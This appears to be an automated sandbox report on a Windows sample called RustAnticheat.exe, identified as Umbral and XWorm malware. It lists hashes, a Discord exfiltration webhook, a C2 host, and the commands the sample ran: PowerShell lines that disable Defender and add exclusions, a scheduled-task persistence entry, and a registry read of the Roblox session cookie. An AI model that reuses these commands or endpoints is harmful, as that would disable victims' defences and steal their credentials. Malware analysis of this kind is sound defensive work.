Analysis
-
max time kernel
0s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
22-09-2024 11:52
Static task
static1
Behavioral task
behavioral1
Sample
RustAnticheat.exe
Resource
win7-20240903-en
General
-
Target
RustAnticheat.exe
-
Size
1.1MB
-
MD5
6d63fe8c87e642d9e380a13803aa6858
-
SHA1
5652877b527da6cec16dfa7e9653d3657fedea8b
-
SHA256
066692a03f240a40c237f5ec3270d27cac1fda40630dd29f40db006b79a542a8
-
SHA512
32ad077db3f44cd184f60a715464a0540615fee76cbb4de20c6a2703b1ef2a74391adfad0e77a4c3b2340f9bafbc18238445f19e7fcebf2c11e76e66376d000d
-
SSDEEP
24576:Ucvup1OydVxYPtGU8ynaQpLUcgs5JTqzCZxGcQVyULZ6U6/:U/1OydfMrgsfX04KZ69/
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1286299751637192826/RNAV05TJwC7uQTEETo8ZiWSJKOrj5gYY87jlWomaK7jJ1jmuh7qm4pMjcc2ZUhDh6jxd
Extracted
xworm
expected-schema.gl.at.ply.gg:2980
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/memory/4092-90-0x000002AC96690000-0x000002AC966D0000-memory.dmp family_umbral behavioral2/files/0x0007000000023467-88.dat family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000023404-6.dat family_xworm behavioral2/memory/1176-54-0x0000000000AB0000-0x0000000000ACC000-memory.dmp family_xworm -
pid Process 1196 powershell.exe 3324 powershell.exe 1432 powershell.exe 2440 powershell.exe 3796 powershell.exe 4888 powershell.exe 1904 powershell.exe 1832 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation RustAnticheat.exe -
Executes dropped EXE 1 IoCs
pid Process 1176 RuntimeBroker.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 discord.com 26 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 19 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3516 cmd.exe 740 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2920 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 740 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4376 schtasks.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2916 wrote to memory of 1176 2916 RustAnticheat.exe 81 PID 2916 wrote to memory of 1176 2916 RustAnticheat.exe 81 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2368 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\RustAnticheat.exe"C:\Users\Admin\AppData\Local\Temp\RustAnticheat.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Users\Admin\RuntimeBroker.exe"C:\Users\Admin\RuntimeBroker.exe"2⤵
- Executes dropped EXE
PID:1176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\RuntimeBroker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:3796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\RuntimeBroker'3⤵
- Command and Scripting Interpreter: PowerShell
PID:1904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker'3⤵
- Command and Scripting Interpreter: PowerShell
PID:1832
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RuntimeBroker" /tr "C:\Users\Admin\AppData\Local\RuntimeBroker"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4376
-
-
-
C:\Users\Admin\RustAntich1eat.exe"C:\Users\Admin\RustAntich1eat.exe"2⤵PID:380
-
-
C:\Users\Admin\Umbral.exe"C:\Users\Admin\Umbral.exe"2⤵PID:4092
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1616
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\Umbral.exe"3⤵
- Views/modifies file attributes
PID:2368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:2440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
PID:3324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵PID:1664
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵PID:3744
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:872
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
PID:1196
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2920
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3516 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:740
-
-
-
-
C:\Users\Admin\AppData\Local\RuntimeBrokerC:\Users\Admin\AppData\Local\RuntimeBroker1⤵PID:3684
-
C:\Users\Admin\AppData\Local\RuntimeBrokerC:\Users\Admin\AppData\Local\RuntimeBroker1⤵PID:4424
-
C:\Users\Admin\AppData\Local\RuntimeBrokerC:\Users\Admin\AppData\Local\RuntimeBroker1⤵PID:1932
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
948B
MD52af06a6b36db9473e4a7d9c7ab72b70b
SHA18ef34b9b961e51bdd1b8d7d9db2ec1b0a4764645
SHA25618a2aa7e245c6732f95fb7749b2b4d29007f2c56a9c5bfbc5e3c127bdfe5f158
SHA5123495567a5d5af94ae27be51313d9e2630c52017d808042fe0d56baa34fa1d246eb15c253d14c77c77a1d8f2f1c81680e623044ae95415b095696e7fa141ac7cf
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD5b5e2fd95470c50743ba121fd6bd03a7b
SHA175545ed499d9dde51a1fc1cf535eb4f50ec79250
SHA256d9c961aaf784b9ce81b0a3aac7a39bd41e9f2702d9c28deb20e786d385b88288
SHA51276bdc793f8b38f603b5ad0957474660bb09e963a2496564b8ceac6591d532fc9498214b81c3908bafc13ff0b07028457c6c997998adfd2203304cb1c82899423
-
Filesize
944B
MD5ade086e87bb9cf928b80c5f6140dc138
SHA1aca5940867d10be2ea4448f1d9fd6bfc7bcd3357
SHA25677c31c5fbd51621d5676f51e97d234b9fef18eee6ee833cc698398c90d6d1eac
SHA51278b607977c295a97c09f3911ecc66fce0e9dde53d9b4dbaae228bdc7111bf7ef4186f6cd12882079e9f7fc1ff6172c765da77111cd4dc4cfc1c4a408ff8f7b4d
-
Filesize
944B
MD5da5c82b0e070047f7377042d08093ff4
SHA189d05987cd60828cca516c5c40c18935c35e8bd3
SHA25677a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA5127360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b
-
Filesize
64B
MD51be494c3627b8547d19169fc31ba0e92
SHA11028fadd6c2cc2946d643eb993f2b84f3e4ad4a3
SHA25627a3d06624169237ed966aa0c83d9c4944d7946ecfb5e4ca7419e630038e5946
SHA5125da4d855ed7206aad843958f8b4f34c45a4c85ef720581927e921cd231fddc06f5f58058851f7ccbaa2f5a2b48716dcf5f1fae044cdc9ed8d0598c1a4db4a998
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD552df854da6b84dd61ab003fb4328dc18
SHA101c64631f4cc05b30a29dc7b943bbfee9c285c38
SHA256de109f35ae10ff796b1e728286f33cb8e3ca632602315752b87c3e158e25aff2
SHA512aa39d0a3a651a2cd8506f37f057346e0036d2211fa3dcb822b2ddd21d1cc399296332a35f03a7119fd113ff93d81d9b176e9297eac48f5021cf3e0c7ffd42196
-
Filesize
4KB
MD568b8e41a47be95d4e0890c7a2c172f8b
SHA10acc5c64f8dd8f83851e9bb6c66c8b9b3495becc
SHA2569050184e58ec997cb29e192c122be0b492b8923e89a88f83bf34d1a7f78df16f
SHA5127f76d3c99156343228c73c25adb581188df6ce8edd643387a8988fc77e65c7e925bab9952e310746302b083e9a00bca6b95ccf2619e23667c125650fa4a23790
-
Filesize
84KB
MD598ccb6806d126e3a211b963d3341efd7
SHA1108dfe1979c04c588f87d6fc2bb57c3ac10f6742
SHA25611f00d48ecd890e9b8658c652a6283ead05dea9bcd641d89d0bd7f0f618f3cd2
SHA512373caadac1ad290d60ea41663482946889ae9e0fea96115e21ba38d19d2bf6123c47501190c3fb33ef51aa07f6dbddc4eab43b82cbc008c4f83684707e1d3510
-
Filesize
827KB
MD5eefb801774c5ccb44153268a9357f5f1
SHA1b1906b22e14edd142c52808ab3e5ba9346b85de5
SHA256677aeb1981c58cba41a5d53ccbbf5b471e62dc49dc326570767da940560d840d
SHA5121cf162fe6184d68dca514059d2de1123e80d0faac401765a54224aa5a987c9454bc92263fbec566835aa7b402f1f63ba59bb425ccc139e0a7391e66991f270b7
-
Filesize
230KB
MD54647720ef8607199527cb3b0bc793587
SHA10728b0cc0fc7e0a1a8ed14c0861f8757780e4163
SHA256349bfc065bf0580379be8c6e0d0dca592deec1bfc104d8d28c70454436de6337
SHA512906baf94232c9f76d193021345259d01e23d81b3d9a948067035979235fd45e739e89b8047148f61d2f210c40e561067a040100ccacebbf8921050f12a0281f8